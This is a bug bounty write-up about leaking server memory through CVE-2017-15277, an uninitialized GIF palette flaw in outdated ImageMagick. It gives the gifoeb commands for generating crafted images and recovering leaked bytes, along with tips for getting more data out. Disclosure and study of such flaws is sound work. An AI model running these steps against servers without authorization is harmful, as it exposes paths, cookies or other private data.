Imagemagick GIF coder vulnerability leads to memory disclosure (Hackerone)

Hello Friends

This is my first write up about a bug which I discovered already around January, hope you guys like it. :)

Around January 2018, I discovered about a vulnerability which is known as Imagemagick GIF exploit by Emil Lerner (Neex) https://github.com/neex.

Let me explain it more briefly:-

Explanation

“Imagemagick gif exploit (CVE-2017–15277) is a type of vulnerability which affects the outdated version of ImageMagick 7.0.6–1 and Graphicsmagick 1.3.26 leaves the palette uninitialized when processing a GIF file that has neither a global nor local palette. If the affected product is used as a library loaded into a process that operates on interesting data, this data sometimes can be leaked via the uninitialized palette.”

Putting it in more simple words, There was server memory leakage for this outdated version of Imagemagick 7.0.6–1 and Graphicsmagick (fault in library processing ) in which you can create exploitable image file, upload to any area around webpage and if you get uninitialized pixel palette in the reflected file, it’s vulnerable to leak some data ( Stack trace + String value).

Also, for those who are new in bug bounty, Imagemagick is an open software to displaying, converting, and editing raster image and vector image files. It’s used in many web application to crop, resize and changing colour, supporting over many image formats.

Let’s jump to Bug exploitation part:-

  • I Downloaded the Neex repository from https://github.com/neex/gifoeb.
  • Afterwards, Created many gif exploitable files using a command ./gifoeb gen 512x512 dump.gif, you can give extension like .gif, .jpg, .tiff , .bmp and many more.
Exploitable Files
  • Afterwards, I tried to upload one of the exploitable files in profile upload feature in Hackerone.

In response, I got different reflected pixels and I was like

  • Then, I started to upload exploitable files and tried to download all the reflected pixel files as much as possible in GIF format.
  • Afterwards , I just saved all the files inside previews folder .
  • Finally recovered all the files using these command

for p in previews/*; do ./gifoeb recover $p | strings; done

As you can see, uninitialized pixels recovered from downloaded GIF files were leaking some memory disclosure collected from server like path or server O/s info and many more.

Report

I submitted this vulnerability to Hackerone own Program (Security).

They consider these bug about Memory leakage and rewarded me with $500 , this was a huge motivation for me as well for first bounty. Thanks to Jobert, Reed, Joystick , Dirk and Wvdv.

Thanks to Emily Lerner(neex) for finding these vulnerability around Imagemagick and creating repo on Github.

Impact

If possible, These Imagemagick GIF exploitable files can leak some mails , cookies, SQL query, path directory and many more.

Hackerone was only having just O/s and Path leakage and other Stack Traces.

Solution

Now it’s been mitigated completely , updating Imagemagick software to latest version behind every Server, no more leakage.

Advice

  • In recent Imagemagick Software, it’s been mitigated, if you try to upload exploitable file, straightway you’ll get black screen image nothing else, so black screen image file will not leak anything.
  • Second, even if you get Reflected Pixel files, try to check whether it’s disclosing something or not, if you only get Stack Traces like these {{{*a/!a^a;bb(b|} Please don’t report it until and unless you get some string values related to server path leakage, info leakage and many more.
  • Third and final, create different image files with different resolution and extensions , focus on more grey pixel palette as it will contain more info rather than blue,green or red pixels. It differs from site to site and Imagemagick outdated version as well.

Timeline

6th Jan 2018 — Report submitted to Security Program (Hackerone)

7th Jan 2018 — Security Team assess the report and Triage the report

7th Jan 2018 — CVE-2017–15277 reference no. was assigned to this report as this vulnerability was founded by Emil Lerner (Neex).

20th Jan 2018 — $500 bounty awarded. My first bounty as well. Really made my day.

7th feb 2018 — Report has been resolved.